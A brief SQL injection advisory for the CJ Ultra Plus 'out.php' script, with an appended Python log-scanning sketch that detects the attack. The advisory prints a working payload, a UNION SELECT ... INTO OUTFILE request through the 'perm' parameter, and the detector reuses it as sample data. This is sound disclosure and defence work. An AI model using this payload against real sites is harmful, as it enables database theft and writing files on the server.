source: https://www.securityfocus.com/bid/13533/info

CJ Ultra Plus is prone to an SQL injection vulnerability.

This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*
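
A detection sketch for requests of this shape, added here as an example and not part of the original advisory or of CJ Ultra Plus: it scans web access logs for 'out.php' requests whose 'perm' parameter is not a plain integer or carries SQL syntax. Assumptions: legitimate 'perm' values are short unsigned integers, the log is in Common Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate 'perm' values are short unsigned integers.
VALID_PERM = re.compile(r"\d{1,10}")
# SQL constructs seen in the advisory's request, plus quote/comment markers.
SQL_MARKERS = re.compile(r"union\s+select|into\s+(?:out|dump)file|/\*|'", re.I)
# Common Log Format: client, identd, user, [time], "METHOD target PROTO", status
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/out.php"):
        return []
    findings = []
    # parse_qs percent-decodes, so %20UNION%20SELECT is matched as ' UNION SELECT'.
    for value in parse_qs(parts.query, keep_blank_values=True).get("perm", []):
        if not VALID_PERM.fullmatch(value):
            findings.append("perm is not a plain integer")
        if SQL_MARKERS.search(value):
            findings.append("perm contains SQL syntax")
    return findings

def scan_log(lines):
    """Return (client, status, findings) for each suspicious out.php request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m:
            findings = check_request(m.group(2))
            if findings:
                hits.append((m.group(1), m.group(3), findings))
    return hits

# Constructed sample log lines; the second carries the request from the advisory.
POC = ("/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20"
       "b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*")
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2000:10:00:01 +0000] "GET /out.php?url=sad&perm=50 HTTP/1.0" 200 312',
    '203.0.113.7 - - [01/Jan/2000:10:00:02 +0000] "GET ' + POC + ' HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for client, status, findings in scan_log(SAMPLE_LOG):
        print(client, status, "; ".join(findings))
```

The same integer check, applied server-side before the value reaches any query, rejects the request outright; the log scan only tells you it was attempted.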